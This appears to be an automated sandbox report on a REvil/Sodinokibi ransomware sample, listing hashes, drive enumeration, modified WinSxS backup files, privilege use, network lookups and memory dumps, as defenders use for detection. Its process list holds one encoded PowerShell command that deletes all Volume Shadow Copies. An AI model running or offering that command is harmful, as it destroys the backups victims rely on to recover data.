Malware Analysis Report

2024-10-19 10:36

Sample ID 230512-fvx5qseb6z
Target 2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe
SHA256 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7
Tags
sodinokibi
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7

Threat Level: Known bad

The file 2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe was found to be: Known bad.

Malicious Activity Summary

sodinokibi

Sodinokibi family

Sodinokibi/Revil sample

Enumerates connected drives

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-12 05:12

Signatures

Sodinokibi family

sodinokibi

Sodinokibi/Revil sample

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-12 05:12

Reported

2023-05-12 05:15

Platform

win7-20230220-en

Max time kernel

23s

Max time network

36s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe

"C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-12 05:12

Reported

2023-05-12 05:15

Platform

win10v2004-20230220-en

Max time kernel

172s

Max time network

183s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.19041.1_none_ca60666860ba12d7_app950.fon_e2e577aa C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_10.0.19041.1_de-de_ce34d3262165aa68_gpsvc.dll.mui_0c160ac2 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-network-security_31bf3856ad364e35_10.0.19041.1266_none_41ea436edfbc2e32_wfplwfs.sys_df3e0120 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-u..erservice.resources_31bf3856ad364e35_10.0.19041.1_it-it_33634d5efb5cf151.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-onecore-pnp-umpnpmgr_31bf3856ad364e35_10.0.19041.662_none_052522aee08549d0.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_de-de_7b16fe6b5fbc6858.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_qps-ploc_2b765c956db488cf_memtest.efi.mui_71e15c22 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-virtualdiskservice_31bf3856ad364e35_10.0.19041.1202_none_dfaaff89afe4f3d4_vdsldr.exe_20c491b3 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-commonlog.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_f71a10e55724c259_clfs.sys.mui_1310ba12 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.19041.1_none_ca60666860ba12d7_ega40866.fon_5e8c53bc C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-p..onmanager.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_e2ed1b5da749d72d_partmgr.sys.mui_b800c491 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_10.0.19041.450_none_15f655ce37f84049_scecli.dll_149e0f7b C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-shsvcs.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_f06032ef729ef08b_shsvcs.dll.mui_b69fccab C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-a..structure.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_5af0d35f5d5822e9.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.19041.906_hr-hr_0e05abbb958aae06_msimsg.dll.mui_72e8994f C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-security-ngc-kspsvc_31bf3856ad364e35_10.0.19041.84_none_5f9dd4d3686528a6.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-v..skservice.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_86d2322d49223ce5_vds.exe.mui_2268d934 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-directui-resources19h1_31bf3856ad364e35_10.0.19041.1_none_a747a941ec33876b.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..-netlogon.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_1484daa47b73afab_netlogon.dll.mui_ecbeb9bd C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_10.0.19041.1_de-de_8398f19094835129_winresume.exe.mui_ff8b5358 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-ntosext_31bf3856ad364e35_10.0.19041.1_none_89e4438cceba3f44_ntosext.sys_e9e096c6 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_de-de_70c254192b5ba65d.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-efs-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_02d41c75ec2f1710.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-oem_31bf3856ad364e35_10.0.19041.1_none_b3552a6f4dc424b4_vga863.fon_0805d564 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_10.0.19041.1_de-de_e1c7c5c5782839e2_wmiapsrv.exe.mui_b1567840 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-rasserver_31bf3856ad364e35_10.0.19041.1081_none_2adbc983514c73da_iprtrmgr.dll_50f5fe79 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_it-it_b0b29d8e18c561a2_dsreg.dll.mui_5d9efc7e C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_4ebe9cd18298b39c.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-t..localsessionmanager_31bf3856ad364e35_10.0.19041.1_none_5b35da44a9e83608.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..sition-coreservices_31bf3856ad364e35_10.0.19041.450_none_107cae8412302d3e_wiarpc.dll_5aecac54 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_10.0.19041.1_es-es_8a83f8a2672d374c_wmiapsrv.exe.mui_b1567840 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-ntasn1-dll_31bf3856ad364e35_10.0.19041.546_none_a281e1595804c734.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..opactivitymoderator_31bf3856ad364e35_10.0.19041.1052_none_7ec56a9d21671e02_dam.sys_fdd762d9 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-onecore-ras-base-vpn_31bf3856ad364e35_10.0.19041.1266_none_9123280a93582482.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-tunnel_31bf3856ad364e35_10.0.19041.1_none_595b16922411e0f5_tunnel.sys_90392579 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-win32kbase.resources_31bf3856ad364e35_10.0.19041.1_es-es_d67b0596196ad316.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..-usermode.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_1f5866fbea0202f7_wudfplatform.dll.mui_d815d31a C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-efs-service.resources_31bf3856ad364e35_10.0.19041.1_de-de_59e3467cfd510b4b_efssvc.dll.mui_03cc4e41 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..eservices.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_31cb74c54c7c9cce_wiaservc.dll.mui_54051b53 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_c68aa74741937c24_userdeviceregistration.ngc.dll.mui_d2c6ca95 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_10.0.19041.1_es-es_d53e3423c57572b5.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..opactivitymoderator_31bf3856ad364e35_10.0.19041.1_none_bfdba9ed0ba30611.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-usermodensi_31bf3856ad364e35_10.0.19041.610_none_5075d9ce26303c63_nsi.dll_e72df756 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-w..-infrastructure-bsp_31bf3856ad364e35_10.0.19041.1_none_78990edc010a0704.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-pcw_31bf3856ad364e35_10.0.19041.1_none_6602a3e1f5dded97.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_10.0.19041.1_de-de_00c609c5ceeb0835_scdeviceenum.dll.mui_815e7662 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-tcpip-driver_31bf3856ad364e35_10.0.19041.1288_none_4cc02c3b6c5e5630.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-directui_31bf3856ad364e35_10.0.19041.1151_none_361ab30ed820622a.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_fi-fi_0bc0c6751faa809f_memtest.efi.mui_71e15c22 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..ore-bootmanager-efi_31bf3856ad364e35_10.0.19041.1_none_3d71f65b3bbd6193.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.19041.1_none_ca60666860ba12d7_dos737.fon_8de20802 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmpdui.resources_31bf3856ad364e35_10.0.19041.1_es-es_2f58d254bd51feff_wmpdui.dll.mui_92411657 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..migration.resources_31bf3856ad364e35_10.0.19041.1_en-us_066aaec65f5dc77a.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_10.0.19041.1_de-de_6ace49ac53b0c2de_axinstsv.dll.mui_be092a2d C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_sl-si_4892e179afed964c_comctl32.dll.mui_0da4e682 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-d..ndowmanager-effects_31bf3856ad364e35_10.0.19041.546_none_d951a72ad1ee4c8e_wuceffects.dll_0c15b7d5 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.19041.906_nb-no_e0132477454b2a7d_msimsg.dll.mui_72e8994f C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-profsvc.resources_31bf3856ad364e35_10.0.19041.1_en-us_1cad2165a3d16b35.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-time-service.resources_31bf3856ad364e35_10.0.19041.1_it-it_95a1a37ffda61620.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.19041.1_none_55d16b95f6e3e25c.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_379018f38e600fa9_wmiutils.dll.mui_42583eaf C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_el-gr_a89731d17de81b67_comctl32.dll.mui_0da4e682 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d2d_31bf3856ad364e35_10.0.19041.546_none_85962dc4bac043a9.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-e..storage-classdriver_31bf3856ad364e35_10.0.19041.1_none_13e0a2d70bde69d7.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe

"C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 164.113.223.173.in-addr.arpa udp
US 40.125.122.151:443 tcp
US 8.8.8.8:53 14.103.197.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 20.42.65.85:443 tcp
US 8.8.8.8:53 86.8.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkgtrjbf.x5r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1164-138-0x000001E4A3760000-0x000001E4A3782000-memory.dmp

memory/1164-143-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-144-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-145-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-146-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-147-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp

memory/1164-148-0x000001E4A2D30000-0x000001E4A2D40000-memory.dmp